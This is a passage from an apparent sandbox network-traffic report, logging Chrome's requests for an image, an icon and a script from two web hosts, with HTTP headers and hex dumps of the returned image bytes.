00 ff 00 be 00 f2 00 be 00 b0
                                                                          Data Ascii: E;
                                                                          2023-11-21 16:58:44 UTC760INData Raw: 00 bc 00 bf 00 f6 00 be 00 fe 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 f2 00 be 00 b0 00 bb 00 40 00 db 00 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b6 00 0e 00 bf 00 6b 00 be 00 de 00 bd 00 fd 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 bf 00 f6 00 be 00 c4 00 bd 00 55 00 c4 00 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 bf 00 0c 00 be 00 4f 00 be 00 c1 00 bf 00 f6 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 bf 00 fe 00 be 00 f3 00
                                                                          Data Ascii: @kUO
                                                                          2023-11-21 16:58:44 UTC761INData Raw: 53 00 be 00 c1 00 be 00 f7 00 bf 00 fe 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 f3 00 be 00 b0 00 be 00 3f 00 b3 00 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff 00 01 00 b4 00 11 00 c0 00 51 00 be 00 bc 00 be 00 f4 00 bf 00 fe 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 fe 00 be
                                                                          Data Ascii: S?Q
                                                                          2023-11-21 16:58:44 UTC763INData Raw: 00 bf 00 54 00 be 00 bc 00 be 00 f5 00 bf 00 fe 00 be 00 ff 00 be 00 ff 00 bf 00 fe 00 be 00 f2 00 bd 00 ab 00 bb 00 40 00 c6 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff 00 01 00 b6 00 0e 00 bf 00 50 00 be 00 bd 00 be 00 f8 00 be 00 fe 00 be 00 fe 00 be 00 f8 00 bd 00 aa 00 c0 00 41 00 c6 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                          Data Ascii: T@PA
                                                                          2023-11-21 16:58:44 UTC764INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          2023-11-21 16:58:44 UTC765INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          39192.168.2.449784172.67.139.604435352C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          2023-11-21 16:58:44 UTC744OUTGET /fim/3079-US/412ed0e567678783f534c1638d0d2adf.jpg HTTP/1.1
                                                                          Host: kronemole.site
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: PHPSESSID=03a2656556074e0f77a0ceaf7389c11a; _ga_DKB9VH2QW4=GS1.1.1700585923.1.0.1700585923.0.0.0; _ga=GA1.1.148937489.1700585924
                                                                          2023-11-21 16:58:44 UTC765INHTTP/1.1 200 OK
                                                                          Date: Tue, 21 Nov 2023 16:58:44 GMT
                                                                          Content-Type: image/jpeg
                                                                          Content-Length: 1971
                                                                          Connection: close
                                                                          Cache-Control: public, max-age=604800
                                                                          expires: Tue, 28 Nov 2023 16:58:44 GMT
                                                                          last-modified: Tue, 21 Nov 2023 16:49:27 GMT
                                                                          x-frame-options: SAMEORIGIN
                                                                          x-xss-protection: 1; mode=block
                                                                          x-content-type-options: nosniff
                                                                          vary: User-Agent,User-Agent
                                                                          CF-Cache-Status: MISS
                                                                          Accept-Ranges: bytes
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=NuBdAwG1ss9aibHD2Y3kj%2BpgfWL6Uk8%2F5yDCJHfS%2FK962AgFuWHjuI7TYdGG5MXaVN8jjcOgws1IIai8eCNmVf%2B%2FkO00ULDcuiWJX4xos3FrritnbLKiiOtR%2FQ940lIIsg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 829a7aac99940850-IAD
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          2023-11-21 16:58:44 UTC766INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 1e 00 00 ff e1 03 2f 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 39 2e 30 2d 63 30 30 30 20 37 39 2e 31 37 31 63 32 37 66 61 62 2c 20 32 30 32 32 2f 30 38 2f 31 36 2d 32 32 3a 33 35 3a 34 31 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46
                                                                          Data Ascii: ExifII*Ducky/http://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c000 79.171c27fab, 2022/08/16-22:35:41 "> <rdf:RDF
                                                                          2023-11-21 16:58:44 UTC767INData Raw: 20 78 6d 70 4d 4d 3a 49 6e 73 74 61 6e 63 65 49 44 3d 22 78 6d 70 2e 69 69 64 3a 30 46 42 36 37 34 39 45 38 42 37 46 31 31 45 44 42 30 42 45 41 45 32 44 31 30 43 45 37 36 37 32 22 20 78 6d 70 4d 4d 3a 44 6f 63 75 6d 65 6e 74 49 44 3d 22 78 6d 70 2e 64 69 64 3a 30 46 42 36 37 34 39 46 38 42 37 46 31 31 45 44 42 30 42 45 41 45 32 44 31 30 43 45 37 36 37 32 22 3e 20 3c 78 6d 70 4d 4d 3a 44 65 72 69 76 65 64 46 72 6f 6d 20 73 74 52 65 66 3a 69 6e 73 74 61 6e 63 65 49 44 3d 22 78 6d 70 2e 69 69 64 3a 30 46 42 36 37 34 39 43 38 42 37 46 31 31 45 44 42 30 42 45 41 45 32 44 31 30 43 45 37 36 37 32 22 20 73 74 52 65 66 3a 64 6f 63 75 6d 65 6e 74 49 44 3d 22 78 6d 70 2e 64 69 64 3a 30 46 42 36 37 34 39 44 38 42 37 46 31 31 45 44 42 30 42 45 41 45 32 44 31 30 43 45
                                                                          Data Ascii: xmpMM:InstanceID="xmp.iid:0FB6749E8B7F11EDB0BEAE2D10CE7672" xmpMM:DocumentID="xmp.did:0FB6749F8B7F11EDB0BEAE2D10CE7672"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:0FB6749C8B7F11EDB0BEAE2D10CE7672" stRef:documentID="xmp.did:0FB6749D8B7F11EDB0BEAE2D10CE
                                                                          2023-11-21 16:58:44 UTC768INData Raw: 5b 17 f0 47 a3 de e3 45 15 cb b8 ee 07 41 ed 7d aa 0f bb c2 8a 2a e5 09 27 b7 37 0f c3 1f be 94 fb 9f fe 2c fc 38 3f 1e 14 51 59 33 77 c3 fa f9 34 e2 ed 97 4f 81 0b ed 51 45 15 a4 03 ff d9
                                                                          Data Ascii: [GEA}*'7,8?QY3w4OQE


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          40192.168.2.449787172.67.139.604435352C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          2023-11-21 16:58:45 UTC827OUTGET /fim/3079-US/2ca755302a35b1e76ba6e2a0cc008202.ico HTTP/1.1
                                                                          Host: kronemole.site
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: PHPSESSID=03a2656556074e0f77a0ceaf7389c11a; _ga_DKB9VH2QW4=GS1.1.1700585923.1.0.1700585923.0.0.0; _ga=GA1.1.148937489.1700585924
                                                                          2023-11-21 16:58:45 UTC837INHTTP/1.1 200 OK
                                                                          Date: Tue, 21 Nov 2023 16:58:45 GMT
                                                                          Content-Type: image/x-icon
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Cache-Control: public, max-age=604800
                                                                          expires: Tue, 28 Nov 2023 16:58:45 GMT
                                                                          last-modified: Tue, 21 Nov 2023 16:47:42 GMT
                                                                          vary: Accept-Encoding,User-Agent,User-Agent
                                                                          x-frame-options: SAMEORIGIN
                                                                          x-xss-protection: 1; mode=block
                                                                          x-content-type-options: nosniff
                                                                          CF-Cache-Status: MISS
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=DvqAgfLID5ioSf99B5XciWYlwLsxJc4kV4zhm4OdF%2FRL0B2QYZo5QZ%2BEPuaMYLQ9gT0pUT4uLyJHoReZtK5Cho9OTOzik5QSU9e8nQJB%2Bmnalw5gtWG7BwA7bo3AW3dBZA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 829a7ab0bbc0392e-IAD
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          2023-11-21 16:58:45 UTC838INData Raw: 33 63 32 65 0d 0a 00 00 01 00 03 00 10 10 00 00 01 00 20 00 68 04 00 00 36 00 00 00 20 20 00 00 01 00 20 00 28 11 00 00 9e 04 00 00 30 30 00 00 01 00 20 00 68 26 00 00 c6 15 00 00 28 00 00 00 10 00 00 00 20 00 00 00 01 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bf 00 0c 00 bc 00 13 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bf 00 20 00 be 00 d0 00 be 00
                                                                          Data Ascii: 3c2e h6 (00 h&(
                                                                          2023-11-21 16:58:45 UTC839INData Raw: 00 00 00 00 00 00 be 00 95 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 bd 00 f8 00 be 00 66 00 be 00 2b 00 be 00 db 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 f4 00 bd 00 59 00 00 00 00 00 00 00 00 00 00 00 00 00 bc 00 39 00 be 00 e9 00 be 00 ff 00 bd 00 f8 00 bf 00 67 00 ff 00 01 00 00 00 00 00 c1 00 29 00 be 00 db 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 bd 00 f5 00 bd 00 59 00 00 00 01 00 00 00 00 00 00 00 00 00 bb 00 3c 00 be 00 cb 00 bd 00 65 00 ff 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 c1 00 29 00 be 00 db 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 f4 00 bf 00 58 00 00 00 01 00 00 00 00 00 00 00 00 00 80 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc 00 2a 00 bf 00 db 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be
                                                                          Data Ascii: f+Y9g)Y<e)X*
                                                                          2023-11-21 16:58:45 UTC840INData Raw: 00 be 00 ff 00 be 00 ff 00 be 00 fe 00 be 00 d5 00 be 00 47 00 ff 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bf 00 08 00 bd 00 6d 00 be 00 eb 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 bf 00 d6 00 bd 00 46 00 ff 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bf 00 08 00 bf 00 6f 00 bf 00 ea 00 bf 00 fe 00 be 00
                                                                          Data Ascii: GmFo
                                                                          2023-11-21 16:58:45 UTC841INData Raw: bd 00 aa 00 be 00 fc 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 e3 00 be 00 5a 00 cc 00 05 00 00 00 00 00 00 00 00 00 00 00 00 00 bf 00 10 00 bc 00 86 00 be 00 f4 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 fe 00 be 00 d7 00 be 00 47 00 ff 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc 00 22 00 bd 00 af 00 be 00 fb 00 be 00 ff 00 be 00 ff 00 be 00 fe 00 be 00 e3 00 bf 00 5c 00 cc 00 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bf 00 10 00 bd 00 87 00 be 00 f3 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 d5 00 bd 00 46 00 aa 00 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                          Data Ascii: ZG"\F
                                                                          2023-11-21 16:58:45 UTC843INData Raw: 00 00 00 c3 00 11 00 be 00 79 00 bd 00 c2 00 bd 00 92 00 bd 00 1f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 aa 00 03 00 b6 00 07 00 bf 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                          Data Ascii: y
                                                                          2023-11-21 16:58:45 UTC844INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          2023-11-21 16:58:45 UTC845INData Raw: 00 00 00 00 00 d4 00 06 00 bf 00 38 00 bd 00 a3 00 be 00 ef 00 bf 00 fe 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 f2 00 bf 00 af 00 bb 00 40 00 b9 00 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 db 00 07 00 bf 00 3c 00 bf 00 a3 00 be 00 ec 00 be 00 fd 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 fe 00 be 00 f3 00 be 00 b0 00 be 00
                                                                          Data Ascii: 8@<
                                                                          2023-11-21 16:58:45 UTC847INData Raw: be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 bd 00 f1 00 be 00 b0 00 bc 00 45 00 b3 00 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 aa 00 06 00 be 00 3b 00 be 00 a9 00 bf 00 ef 00 be 00 fd 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 f2 00 be 00 b0
                                                                          Data Ascii: E;
                                                                          2023-11-21 16:58:45 UTC848INData Raw: 00 bc 00 bf 00 f6 00 be 00 fe 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 f2 00 be 00 b0 00 bb 00 40 00 db 00 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b6 00 0e 00 bf 00 6b 00 be 00 de 00 bd 00 fd 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 bf 00 f6 00 be 00 c4 00 bd 00 55 00 c4 00 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 bf 00 0c 00 be 00 4f 00 be 00 c1 00 bf 00 f6 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 bf 00 fe 00 be 00 f3 00
                                                                          Data Ascii: @kUO
                                                                          2023-11-21 16:58:45 UTC849INData Raw: 53 00 be 00 c1 00 be 00 f7 00 bf 00 fe 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 f3 00 be 00 b0 00 be 00 3f 00 b3 00 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff 00 01 00 b4 00 11 00 c0 00 51 00 be 00 bc 00 be 00 f4 00 bf 00 fe 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 fe 00 be
                                                                          Data Ascii: S?Q
                                                                          2023-11-21 16:58:45 UTC851INData Raw: 00 bf 00 54 00 be 00 bc 00 be 00 f5 00 bf 00 fe 00 be 00 ff 00 be 00 ff 00 bf 00 fe 00 be 00 f2 00 bd 00 ab 00 bb 00 40 00 c6 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff 00 01 00 b6 00 0e 00 bf 00 50 00 be 00 bd 00 be 00 f8 00 be 00 fe 00 be 00 fe 00 be 00 f8 00 bd 00 aa 00 c0 00 41 00 c6 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                          Data Ascii: T@PA
                                                                          2023-11-21 16:58:45 UTC852INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          2023-11-21 16:58:45 UTC853INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          41192.168.2.449788172.64.96.164435352C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          2023-11-21 16:58:45 UTC837OUTGET //scripts/pg/v9e118mez8 HTTP/1.1
                                                                          Host: trk-amropode.com
                                                                          Connection: keep-alive
                                                                          Cache-Control: max-age=0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: cross-site
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://kronemole.site/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-11-21 16:58:45 UTC853INHTTP/1.1 200 OK
                                                                          Date: Tue, 21 Nov 2023 16:58:45 GMT
                                                                          Content-Type: application/javascript;charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          expires: 0
                                                                          Cache-Control: max-age=14400, must-revalidate
                                                                          x-xss-protection: 1; mode=block
                                                                          pragma: no-cache
                                                                          x-frame-options: SAMEORIGIN
                                                                          referrer-policy: strict-origin-when-cross-origin
                                                                          content-security-policy: default-src 'self'; frame-src 'self' data:; connect-src 'self' https://cdn-media-2020.s3.amazonaws.com; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://storage.googleapis.com; style-src 'self' 'unsafe-inline'; img-src * 'self' https://* blob: data:; font-src 'self' data:
                                                                          vary: Origin
                                                                          vary: Access-Control-Request-Method
                                                                          vary: Access-Control-Request-Headers
                                                                          x-content-type-options: nosniff
                                                                          permissions-policy: camera=(), fullscreen=(self), geolocation=(), gyroscope=(), magnetometer=(), microphone=(), midi=(), payment=(), sync-xhr=()
                                                                          CF-Cache-Status: HIT
                                                                          Age: 1349
                                                                          Last-Modified: Tue, 21 Nov 2023 16:36:16 GMT
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=NSjwqxKDJX0SHhG1DkH4GTfKyTeGIU3r4dKLaCuFEa4w5RjVv22n75gFTkbievZoZ%2BPucBM%2FYpLg9iySSvy7rW4CjbZA9Ly3IUGtChVmJsa74IJ5bfrJJHJ%2B29pRmrl2ZcKY"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 829a7ab2bd4c17ad-EWR
                                                                          2023-11-21 16:58:45 UTC855INData Raw: 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
